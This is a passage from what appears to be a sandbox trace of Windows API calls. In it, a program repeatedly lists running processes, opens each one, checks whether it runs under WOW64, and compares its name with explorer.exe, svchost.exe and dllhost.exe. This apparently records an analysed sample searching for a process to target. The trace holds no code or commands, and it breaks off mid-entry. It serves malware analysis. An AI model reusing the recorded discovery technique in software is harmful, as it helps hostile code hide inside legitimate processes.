[0249.331] CloseHandle (hObject=0xd8) returned 1 [0249.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0249.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0249.331] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.331] CloseHandle (hObject=0xd8) returned 1 [0249.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0249.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0249.332] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.332] CloseHandle (hObject=0xd8) returned 1 [0249.332] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0249.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0249.333] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.333] CloseHandle (hObject=0xd8) returned 1 [0249.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0249.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0249.333] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.333] CloseHandle (hObject=0xd8) returned 1 [0249.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0249.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0249.334] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.334] CloseHandle (hObject=0xd8) returned 1 [0249.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0249.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0249.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0249.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0249.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0249.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0249.337] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.337] CloseHandle (hObject=0xd8) returned 1 [0249.337] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0249.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0249.337] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.337] CloseHandle (hObject=0xd8) returned 1 [0249.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0249.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0249.337] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0249.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0249.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0249.338] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.338] CloseHandle (hObject=0xd8) returned 1 [0249.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0249.339] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.339] CloseHandle (hObject=0xd8) returned 1 [0249.339] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0249.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0249.340] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.340] CloseHandle (hObject=0xd8) returned 1 [0249.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0249.341] CloseHandle (hObject=0xd4) returned 1 [0249.341] Sleep (dwMilliseconds=0x3e8) [0250.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0250.368] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0250.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0250.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0250.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0250.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0250.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0250.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0250.372] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0250.373] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0250.374] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0250.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0250.374] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0250.375] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0250.375] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0250.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0250.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0250.377] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0250.377] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0250.378] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0250.378] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0250.378] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.379] CloseHandle (hObject=0xd8) returned 1 [0250.379] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0250.379] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0250.379] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0250.379] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0250.379] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0250.380] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.380] CloseHandle (hObject=0xd8) returned 1 [0250.380] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0250.380] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0250.380] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0250.380] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0250.380] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0250.381] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0250.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0250.381] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.381] CloseHandle (hObject=0xd8) returned 1 [0250.381] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0250.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0250.382] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.382] CloseHandle (hObject=0xd8) returned 1 [0250.382] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0250.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0250.382] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.383] CloseHandle (hObject=0xd8) returned 1 [0250.383] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0250.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0250.383] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.383] CloseHandle (hObject=0xd8) returned 1 [0250.383] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0250.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0250.384] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.384] CloseHandle (hObject=0xd8) returned 1 [0250.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0250.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0250.384] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.384] CloseHandle (hObject=0xd8) returned 1 [0250.384] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0250.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0250.385] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.385] CloseHandle (hObject=0xd8) returned 1 [0250.385] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0250.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0250.385] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.385] CloseHandle (hObject=0xd8) returned 1 [0250.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0250.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0250.386] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.386] CloseHandle (hObject=0xd8) returned 1 [0250.386] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0250.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0250.387] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.387] CloseHandle (hObject=0xd8) returned 1 [0250.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0250.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0250.387] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0250.387] CloseHandle (hObject=0xd8) returned 1 [0250.387] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0250.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0250.388] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: 